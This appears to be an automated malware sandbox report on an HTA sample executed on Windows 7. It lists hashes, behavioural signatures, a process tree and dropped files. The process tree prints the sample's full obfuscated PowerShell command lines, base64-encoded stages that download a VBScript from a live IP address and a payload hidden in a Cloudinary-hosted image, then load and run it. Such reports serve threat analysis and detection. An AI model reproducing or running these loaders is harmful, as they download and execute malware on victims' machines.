Analysis
-
max time kernel
13s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
16-12-2024 06:16
Behavioral task
behavioral1
Sample
clearentirethingwithbestnoticetheeverythinggooodfrome.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
clearentirethingwithbestnoticetheeverythinggooodfrome.hta
Resource
win10v2004-20241007-en
General
-
Target
clearentirethingwithbestnoticetheeverythinggooodfrome.hta
-
Size
144KB
-
MD5
5215d83b478d7a718062863c5efbbeeb
-
SHA1
9ac735295a8b3bc10740d50669f6fa5c81ae10ce
-
SHA256
af6c6b710e9a4c5e2d8b53642779548a4edcd528cd7e5714c6ac9d69f38efb80
-
SHA512
b1ea72019653fa7858aa1b6ad1fa3fcf6974ade703be0edd55f891030706fc675425e5f1372dc3a61671dff5e40e6baceba019af60711cd65a248f7cecbca915
-
SSDEEP
768:t1EZFxaTOum2oum2M5KUJDVUKhCbGVf/AMF9woN83WkkA7MhrkK0IHj66666666l:tg
Malware Config
Extracted
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2888 powershell.exe 6 2184 powershell.exe 8 2184 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2888 powershell.exe 2260 cmd.exe -
pid Process 2184 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2888 powershell.exe 2184 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2888 powershell.exe Token: SeDebugPrivilege 2184 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2820 wrote to memory of 2260 2820 mshta.exe 30 PID 2820 wrote to memory of 2260 2820 mshta.exe 30 PID 2820 wrote to memory of 2260 2820 mshta.exe 30 PID 2820 wrote to memory of 2260 2820 mshta.exe 30 PID 2260 wrote to memory of 2888 2260 cmd.exe 32 PID 2260 wrote to memory of 2888 2260 cmd.exe 32 PID 2260 wrote to memory of 2888 2260 cmd.exe 32 PID 2260 wrote to memory of 2888 2260 cmd.exe 32 PID 2888 wrote to memory of 2168 2888 powershell.exe 33 PID 2888 wrote to memory of 2168 2888 powershell.exe 33 PID 2888 wrote to memory of 2168 2888 powershell.exe 33 PID 2888 wrote to memory of 2168 2888 powershell.exe 33 PID 2168 wrote to memory of 2908 2168 csc.exe 34 PID 2168 wrote to memory of 2908 2168 csc.exe 34 PID 2168 wrote to memory of 2908 2168 csc.exe 34 PID 2168 wrote to memory of 2908 2168 csc.exe 34 PID 2888 wrote to memory of 3052 2888 powershell.exe 36 PID 2888 wrote to memory of 3052 2888 powershell.exe 36 PID 2888 wrote to memory of 3052 2888 powershell.exe 36 PID 2888 wrote to memory of 3052 2888 powershell.exe 36 PID 3052 wrote to memory of 2184 3052 WScript.exe 37 PID 3052 wrote to memory of 2184 3052 WScript.exe 37 PID 3052 wrote to memory of 2184 3052 WScript.exe 37 PID 3052 wrote to memory of 2184 3052 WScript.exe 37
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\clearentirethingwithbestnoticetheeverythinggooodfrome.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f4i-val-.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDC9A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDC99.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2908
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHVuYmlvdHVyYmF0ZWQuSW52b2tlKCRudWxsLCBAKCcwLzFEYkJwL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckYmFja3NjYXR0ZXJpbmdzJywgJyRiYWNrc2NhdHRlcmluZ3MnLCAnJGJhY2tzY2F0dGVyaW5ncycsICdDYXNQb2wnLCAnJGJhY2tzY2F0dGVyaW5ncycsICckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCcxJywnJGJhY2tzY2F0dGVyaW5ncycsJycpKTs=';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2184
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5340e5ee8c96ac698a3962b53efca0607
SHA12ab621274db0229a4bb7ce84fa56581c4f3e391c
SHA25677f6695a9a60211c6185bd96d2ca509061a8e3db0c2ee08cd31e913bde6c85af
SHA51277d5f470f8e02cdf126a6aefa16df001941004023c23efbd9b447c4735fa5284a3df9ab49b50cccc3b4082432a9a04cf216539b48295dbbd51e39e58ca086f9e
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
3KB
MD5a000e6722491a0d9398220643cee477b
SHA166c3284a05dbeccd1c32609394b1a6b6531dd7cd
SHA256f79e851365a64558d4f98f40bac856f4e02b303c62d721534f5cb709e7512f21
SHA5126872fd2b7e77ecdb4fddc419e1bd80fc1757aa5bcb13b80f0b00ad16fc66c741b3aef26ead7a1d95815bf21473337c28fe55cce516ac24b081303ac7fcec257b
-
Filesize
7KB
MD5f50ebd7af7d8f364118015abfb8b08be
SHA1005ccf081c96bcdcc7afbaf7a7ec55b641ab8cf2
SHA2569cbd4ea1264217dda6c706635346cd2ecfcf1ae924e4b45350f9f94bf7edef08
SHA5128bcee57d3fc019279c9a94a6a97b7278d9faf24eceed86ce4186bcae142084cc61744faa08969bdb601628b22afe39adbbd07e1a1638e7d11582cc0b3b376ba3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5aa8b0865c82482bb97f5d0233ae28cd8
SHA1aee060486a6f94460ee203cee57b15c0b53a2bce
SHA2569074b4246394295b0562dc92ae6cf01848192b82428b135050878cee946214aa
SHA512f9133d6d898611e52f61875339094192342e1f02aebc7973111736470359ff907532d0e49b49cc48c32c5468ccd9acbdcb4662cbd340cf159942bcf80ccb652b
-
Filesize
150KB
MD52e124153be958647e84566b305ecf94e
SHA1d7d06fe6314ee8e4c31a971872632477ede38248
SHA2565b5835cebcc79ae42d3edc11ddca5e2f6c4bf333e78d1b2d0733a091a9fd887e
SHA5129bb7f048cfa817e406d63affc034ea89f7beb6dd584521d5b1a531a032e22470bb9e9c8a12931b5838a77267acf5fe64e8e788caee49c014348b75925614e450
-
Filesize
652B
MD54a8620b92877686dd46b56eaf19db486
SHA1755d4bbfc9ff8e10e60aa3d4e33f51a433c5b0da
SHA2563b3262f72df1f26a6c6c7dd2d657c01e3f73fa06c0c4cd0bd0bc1b7e91d62158
SHA5122fb844a12014c15395d84234e2c418501c846792b880c407b74167aac817a193ccd1d2790e97afd2bc3339e2c446167b35859346b52e36acbd67df5fad70195c
-
Filesize
475B
MD50c431e10cf228fe2c475697b04ff0ebb
SHA104439e5d97e5c2e03f57caf24564925b32d644cb
SHA256f0514c83d3a0460e90e267fbb96546f4b5890906eb7ea94799c38ec743fb91ae
SHA512954a57476daa5408f0ff679972741e63e8fe61ff20bdefc40b83ad6ff633b0a7d5d3ddce7cfaff0a5ff0bc2300704f6c5639adbf44f38a818d22644814e5efcb
-
Filesize
309B
MD5949b2c4e71ad3c978a293488ddfb74d9
SHA171de0ff5b824c3171970c916ff91dd76b1e14725
SHA2568115f42588901c6c5057c397723dda0bee3d0a1e68cc98ede40680538da048f9
SHA512ebaa9a4b22923b89f5dd8d71852e5604c531163a2ff804bd4222a7de6891ac84142457c3eb117d14d7a1173430f49dd6dec1233945a33ba6bcb73052e5916fb1